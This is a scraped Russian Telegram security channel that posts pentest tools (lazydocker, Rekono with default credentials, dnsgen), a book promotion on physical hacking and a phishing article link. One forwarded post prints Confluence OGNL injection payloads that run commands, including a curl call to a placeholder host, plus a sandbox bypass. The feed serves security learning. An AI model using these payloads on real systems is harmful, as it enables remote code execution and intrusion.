This media is not supported in your browser
VIEW IN TELEGRAM
lazydocker
Lazydocker - это инструмент с TUI, разработанный на языке Go, предназначенный для управления Docker и Docker-compose. Он упрощает задачи связанные с Docker, такие как перезапуск ошибочных микросервисов, просмотр журналов и управление контейнерами, предоставляя одноклавишный доступ к общим командам и настраиваемым командам. Его целью является упрощение управления контейнерами с функциями просмотра состояния контейнеров, журналов, графиков и настраиваемых метрик. Для работы Lazydocker требуется установленные Docker и Docker-compose, и его можно установить через Homebrew, Scoop, Chocolatey, asdf-vm, либо вручную с использованием Go. В документации также описаны комбинации клавиш, интересные особенности, такие как одноклавишный доступ к командам, и руководство по внесению вклада в проект.
Установка:
💬 Канал | 💻 Github | ⌨️ Keybindings
Lazydocker - это инструмент с TUI, разработанный на языке Go, предназначенный для управления Docker и Docker-compose. Он упрощает задачи связанные с Docker, такие как перезапуск ошибочных микросервисов, просмотр журналов и управление контейнерами, предоставляя одноклавишный доступ к общим командам и настраиваемым командам. Его целью является упрощение управления контейнерами с функциями просмотра состояния контейнеров, журналов, графиков и настраиваемых метрик. Для работы Lazydocker требуется установленные Docker и Docker-compose, и его можно установить через Homebrew, Scoop, Chocolatey, asdf-vm, либо вручную с использованием Go. В документации также описаны комбинации клавиш, интересные особенности, такие как одноклавишный доступ к командам, и руководство по внесению вклада в проект.
Установка:
brew install jesseduffield/lazydocker/lazydocker
scoop install lazydocker
choco install lazydocker
curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/scripts/install_update_linux.sh | bash
go install github.com/jesseduffield/lazydocker@latest
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4
This media is not supported in your browser
VIEW IN TELEGRAM
Rekono
👨💻 Rekono - это платформа автоматизации, которая оптимизирует процессы пентеста, интегрируя различные инструменты для хакинга для автоматического проведения всесторонних ассессментов по целям. Она отправляет результаты по электронной почте или через Telegram и может быть интегрирована с Defect-Dojo для более продвинутого управления уязвимостями. Платформа включает удобного бота для Telegram для выполнения задач из любой точки. Rekono Desktop может быть установлен локально на Kali Linux или Parrot OS. Она поддерживает множество инструментов для похека, таких как Nmap, Metasploit, OWASP ZAP и другие.
В последнем релизе Kali Linux этот инструмент был добавлен в официальный репозиторий.
Установка:
📌 Дефолтные креды:
💬 Канал | 💻 Github | ❕ Документация
В последнем релизе Kali Linux этот инструмент был добавлен в официальный репозиторий.
Установка:
apt install rekono-kbx
# Для тех, у кого Parrot OS
wget https://github.com/pablosnt/rekono/releases/download/1.6.3/rekono-kbx_1.6.3_amd64.deb && dpkg -i rekono-kbx_1.6.3_amd64.deb || apt -f install -y
docker-compose build
docker-compose up -d --scale executions-worker=5
rekono:rekono
Инструменты, который использует данный framework:theHarvester
EmailHarvester
EmailFinder
Nmap
Sslscan
SSLyze
SSH Audit
SMBMap
Dirsearch
Gobuster
GitLeaks & GitDumper
Log4j Scan
Spring4Shell Scan
CMSeeK
OWASP JoomScan
OWASP ZAP
Nikto
Nuclei
SearchSploit
Metasploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3❤2
Forwarded from s0i37_channel
Друзья! Книга "Физические атаки с использованием хакерских устройств" наконец вышла и доступна для заказа (https://bhv.ru/product/hakerstvo-fizicheskie-ataki-s-ispolzovaniem-hakerskih-ustrojstv/). Работа начатая еще в далеком 2020 году как презентация для научно технического совета, развитая в 10 отдельных статей и затем объединенная в единый документ, наконец закончена. Благодаря финансовой поддержки компании УЦСБ книга выходит в цветном формате с множеством фотографий, цветных листингов кода и конфигов.
О чем книга.
При тестировании на проникновение физические атаки не обязательно могут быть связаны с грубой силой. Для потенциального злоумышленника, подошедшего максимально близко к своим целям, существует целое множество атак, часть из которых широкой публике почти не известна.
А широкое распространение беспроводных технологий позволяет атакующему выполнить проникновение даже не преодолевая физический периметр, действуя уже по модели внешнего нарушителя.
В книге показано на что способен киберпреступник, замотивированный настолько, чтобы оказаться в зоне действия беспроводных сетей, или даже ещё ближе... Что киберпреступник, находящийся так близко располагает куда большими возможностями, нежели развивая свои атаки из сети интернет.
Книга состоит из трех частей:
- В первой части показаны наиболее актульные вектора атак с непосредственным физическим доступом.
- Во второй части атаки станут удаленными, применяемыми уже по радиоканалу, с расстояния от нескольких до десятков метров. И таких атак как ни странно будет гораздо больше.
- В третьей части акцент сделан уже не на атаки, а на физические импланты - специальные устройства, поддерживающие удаленный доступ в различных обстоятельствах.
Книга покажет что:
- оперативная память может быть достаточно просто украдена с заблокированного компьютера вместе со всеми секретами и паролями, даже если диск зашифрован
- сетевой трафик может быть снят прямо с провода простыми электрическими клеммами
- обычная свиду флешка может быть не тем чем кажется и при подключении способна скомпрометировать любой компьютер за секунду
- с заблокированного компьютера можно перехватить сетевой трафик и чувствительные данные используя для этого только USB
- как длительные по времени атаки на беспроводные сети могут быть эффективно произведены с помощью обычных одноплатных ПК
- а молниеносные атаки на беспроводные технологии могут быть совершены с летящего дрона, который управляется злоумышленником за сотни километров
- обычный человек со смартфоном в руке может взломать практически любую современную компанию за секунду
- как с помощью одноплатного ПК незаметно вклиниться между сетевыми устройствами, с тем что бы предоставить удаленный доступ
- как 4G модем может быть использован для удаленного доступа к физически изолированному компьютеру
- и наконец как обычный минителефон легким движением руки может превратиться в шпионское устройство
На протяжении 300 страниц вы не встретите ни одной атаки с ноутбука - только телефон (nethunter, shark jack), одноплатники (pineapple, bash bunny, packet squirrel), ардуино (rubber ducky), флешка, дроны и 4g модемы (lan turtle).
В ходе повествования читатель ни раз заметит, что реальный взлом с телефоном или другими девайсами может не сильно отличаться от того что представлено в играх Watch Dogs или сериале Mister Robot.
Книга одинаково хорошо подойдет как людям не очень хорошо разбирающимся в технике благодаря множеству наглядных цветных фото реальных атак и стендов, так и искушенных умов которые подчерпнут много полезного из не менее красочных цветных листингов кода и конфигов.
И наконец книга просто обязательна к прочтению каждому сотруднику службы безопасности каждой компании. Ведь данная книга - это самый лучший способ открыть глаза на актуальные угрозы современного цифрового мира, что позволит сделать каждую компанию и весь мир хоть чуточку но безопаснее.
О чем книга.
При тестировании на проникновение физические атаки не обязательно могут быть связаны с грубой силой. Для потенциального злоумышленника, подошедшего максимально близко к своим целям, существует целое множество атак, часть из которых широкой публике почти не известна.
А широкое распространение беспроводных технологий позволяет атакующему выполнить проникновение даже не преодолевая физический периметр, действуя уже по модели внешнего нарушителя.
В книге показано на что способен киберпреступник, замотивированный настолько, чтобы оказаться в зоне действия беспроводных сетей, или даже ещё ближе... Что киберпреступник, находящийся так близко располагает куда большими возможностями, нежели развивая свои атаки из сети интернет.
Книга состоит из трех частей:
- В первой части показаны наиболее актульные вектора атак с непосредственным физическим доступом.
- Во второй части атаки станут удаленными, применяемыми уже по радиоканалу, с расстояния от нескольких до десятков метров. И таких атак как ни странно будет гораздо больше.
- В третьей части акцент сделан уже не на атаки, а на физические импланты - специальные устройства, поддерживающие удаленный доступ в различных обстоятельствах.
Книга покажет что:
- оперативная память может быть достаточно просто украдена с заблокированного компьютера вместе со всеми секретами и паролями, даже если диск зашифрован
- сетевой трафик может быть снят прямо с провода простыми электрическими клеммами
- обычная свиду флешка может быть не тем чем кажется и при подключении способна скомпрометировать любой компьютер за секунду
- с заблокированного компьютера можно перехватить сетевой трафик и чувствительные данные используя для этого только USB
- как длительные по времени атаки на беспроводные сети могут быть эффективно произведены с помощью обычных одноплатных ПК
- а молниеносные атаки на беспроводные технологии могут быть совершены с летящего дрона, который управляется злоумышленником за сотни километров
- обычный человек со смартфоном в руке может взломать практически любую современную компанию за секунду
- как с помощью одноплатного ПК незаметно вклиниться между сетевыми устройствами, с тем что бы предоставить удаленный доступ
- как 4G модем может быть использован для удаленного доступа к физически изолированному компьютеру
- и наконец как обычный минителефон легким движением руки может превратиться в шпионское устройство
На протяжении 300 страниц вы не встретите ни одной атаки с ноутбука - только телефон (nethunter, shark jack), одноплатники (pineapple, bash bunny, packet squirrel), ардуино (rubber ducky), флешка, дроны и 4g модемы (lan turtle).
В ходе повествования читатель ни раз заметит, что реальный взлом с телефоном или другими девайсами может не сильно отличаться от того что представлено в играх Watch Dogs или сериале Mister Robot.
Книга одинаково хорошо подойдет как людям не очень хорошо разбирающимся в технике благодаря множеству наглядных цветных фото реальных атак и стендов, так и искушенных умов которые подчерпнут много полезного из не менее красочных цветных листингов кода и конфигов.
И наконец книга просто обязательна к прочтению каждому сотруднику службы безопасности каждой компании. Ведь данная книга - это самый лучший способ открыть глаза на актуальные угрозы современного цифрового мира, что позволит сделать каждую компанию и весь мир хоть чуточку но безопаснее.
Издательство БХВ
Хакерство. Физические атаки с использованием хакерских устройств - Издательство БХВ
Издательство БХВ | Книга посвящена физическим атакам на беспроводные сети и компьютеры с использованием самодельных хакерских устройств и защите от них.
🔥4❤🔥1🎉1
s0i37_channel
Друзья! Книга "Физические атаки с использованием хакерских устройств" наконец вышла и доступна для заказа (https://bhv.ru/product/hakerstvo-fizicheskie-ataki-s-ispolzovaniem-hakerskih-ustrojstv/). Работа начатая еще в далеком 2020 году как презентация для…
Очень хороший знакомый, коллега по цеху, наконец-то выпустил свою книгу! Замечу, что книга цветная, а не ЧБ как это обычно бывает.
Я уже купил себе экземпляр. Так что вы тоже успевайте
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤🔥2
dnsgen
Инструмент dnsgen создает комбинации доменных имен с использованием предоставленных входных данных и списка слов. Он подобен инструменту altdns, но не выполняет резолв DNS. Для этой цели можно использовать dnsx. Инструмент позволяет настраивать извлечение слов и предлагает такие методы, как вставка, замена и манипуляции словами в поддоменах.
Установка:
💬 Канал | 💻 Github
Инструмент dnsgen создает комбинации доменных имен с использованием предоставленных входных данных и списка слов. Он подобен инструменту altdns, но не выполняет резолв DNS. Для этой цели можно использовать dnsx. Инструмент позволяет настраивать извлечение слов и предлагает такие методы, как вставка, замена и манипуляции словами в поддоменах.
Установка:
pip3 install dnsgen
git clone https://github.com/ProjectAnte/dnsgen; cd dnsgen; pip3 install -r requirements.txt; python3 setup.py install
Использование:cat domains.txt | dnsgen - | dnsx -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7
В эту субботу буду на IT-пикнике от Тинькофф. Если кто-то там будет, то увидимся в субботу!
👍9
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Вот смотрю ещё один свежий материал по фишингу от TrustedSec. Главная идея: с помощью HTML инъекции отправить сообщение с доверенного домена.
https://www.trustedsec.com/blog/crafting-emails-with-html-injection
Т.е. это двойной фишинг получается?! Сложно пока, но интересно...
#pentest #redteam #fishing
https://www.trustedsec.com/blog/crafting-emails-with-html-injection
Т.е. это двойной фишинг получается?! Сложно пока, но интересно...
#pentest #redteam #fishing
TrustedSec
Crafting Emails with HTML Injection
If an HTML-enabled email is sent that contains user input, it can be vulnerable to HTML injection, which can allow an attacker to change the entire body…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤🔥2🌚1
Forwarded from Monkey Hacker
OGNL and sandboxes
Существует такая вещь в
Спустя время, выяснилось, что через😻
Разберу пару вулн в
При рендеринге странице, есть спрятанный параметр😑
Именно он дает нам возможность, поиграться с
Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень(не забудь энкодить) 👍
Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.
Самое банальное - это использовать
Дальше, один из экспертов решил пойти глубже и начал смотреть
Самое вкусное было найдено в
Всем удачи😇
Существует такая вещь в
Java, как Object Graph Notation Language (OGNL) еще один Expression language. Чаще всего данный фреймворк можно заметить в продуктах Apache и Attlasian OGNL вызывает методы несколько иначе, чем Java, поскольку OGNL интерпретируется и должен выбрать нужный метод во время выполнения программы, не имея никакой дополнительной информации о типе, кроме собственно предоставленных аргументов. OGNL всегда выбирает наиболее специфичный метод, типы которого соответствуют заданным аргументамСпустя время, выяснилось, что через
OGNL можно также сделать Command Injection. Метод эксплуатации чем-то напоминает SSTI Разберу пару вулн в
Confluence. Проблемы появлялись из-за isSafeExpressionПри рендеринге странице, есть спрятанный параметр
queryString Именно он дает нам возможность, поиграться с
Java queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl your-domain.com\u0022)}%2b\u0027Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Qualys-Response",#a))}Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.
Самое банальное - это использовать
Class, вместо class. Или использовать конкатенацию строк.Дальше, один из экспертов решил пойти глубже и начал смотреть
Abstract Syntax Tree (AST). Как оказалось, AST давал много векторов, для обхода ограниченийСамое вкусное было найдено в
BeanMap, который позволял сделать, уже полноценный байпасс(#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))Всем удачи
Please open Telegram to view this post
VIEW IN TELEGRAM
👾7⚡1
Книга Хакерство. Физические атаки с использованием хакерских устройств
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
P.S. предвижу холивары на тему, "где электронная версия?" В ближайшее время её ждать не стоит, т.к. это требование издательства, а не автора.
#book
💬 Канал | 💬 Канал автора книги
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤4👾1
Forwarded from KazDevOps
Секреты регулярно просачиваются в конвейеры CI/CD, так как рабочие процессы требуют от разработчиков учетных данных для сторонних ресурсов, с которыми взаимодействует их конвейер.
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
👍10🆒2
Forwarded from AKTIV.CONSULTING
Ознакомиться с рейтингом уязвимостей
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍2🆒2